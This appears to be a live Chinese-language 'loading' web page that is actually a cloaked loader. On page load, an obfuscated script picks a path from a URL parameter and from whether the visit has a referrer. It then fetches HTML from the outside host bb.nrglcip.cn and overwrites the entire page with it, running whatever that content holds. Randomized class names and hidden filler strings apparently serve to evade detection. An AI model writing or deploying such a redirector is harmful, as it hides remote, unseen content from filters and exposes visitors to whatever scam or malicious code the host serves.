<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .oc11DA9 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .oc11DA9 .wu9eFX {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .oc11DA9 .content {
            line-height: 50px;
            text-align: center
        }

        .oc11DA9 .img {
            width: 100%
        }

        .oc11DA9 .gDdCSFmk {
            text-align: center
        }

        .oc11DA9 .gDdCSFmk span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .oc11DA9 .gDdCSFmk span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .oc11DA9 .gDdCSFmk span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .oc11DA9 .gDdCSFmk span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .oc11DA9 .gDdCSFmk span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .oc11DA9 .gDdCSFmk span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .oc11DA9 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function Eyd50YkL8(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var krDCI3k = Eyd50YkL8('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ krDCI3k +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ krDCI3k +".html?a=share";
		}
		
        vC1OTEgC=url+"#"+new Date().getTime();
        vC1OTEgC && function() {
            $.get(vC1OTEgC, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<div style='display:none'>KD65HXOcANDMGHaeqnAcFwGD8qWIkIjlAUoUxLT8xR7LVAWMiNwIF5akeA</div>
<p  style='display:none'>nk3tYOj6vPds0xIxesssGzSLnVyCp6TniOiRDt3lruqebXx</p>
<h1 style='display:none' >a45MTpyyvILipJFo8Fg0XtffTQHMiWBAPNB9CEoamvEWt55V4w31YnGrFn70pZl2XR2wxlW</h1>
<h1 style='display:none' >a45MTpyyvILipJFo8Fg0XtffTQHMiWBAPNB9CEoamvEWt55V4w31YnGrFn70pZl2XR2wxlW</h1>
<b style='display:none' >Nh4ZnGVvqeBMWce4cW4TbcyEjp7O3hGekFSa5dzIiwTek</b><div class="oc11DA9">
    <div class="wu9eFX">
        <div class="gDdCSFmk">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<ul style='display:none' >M2PvBotC48guvfZeJJJuH2a7BLomusjSFYhWHLNdsUx2sdY36X9SXOYSoWUAyEINNa45ThCmCb</ul>
<p  style='display:none'>ZyW66ksVIjw81cRL8tvikvpC8H0gGgKbk</p>
<ul style='display:none' >M2PvBotC48guvfZeJJJuH2a7BLomusjSFYhWHLNdsUx2sdY36X9SXOYSoWUAyEINNa45ThCmCb</ul></body>
</html>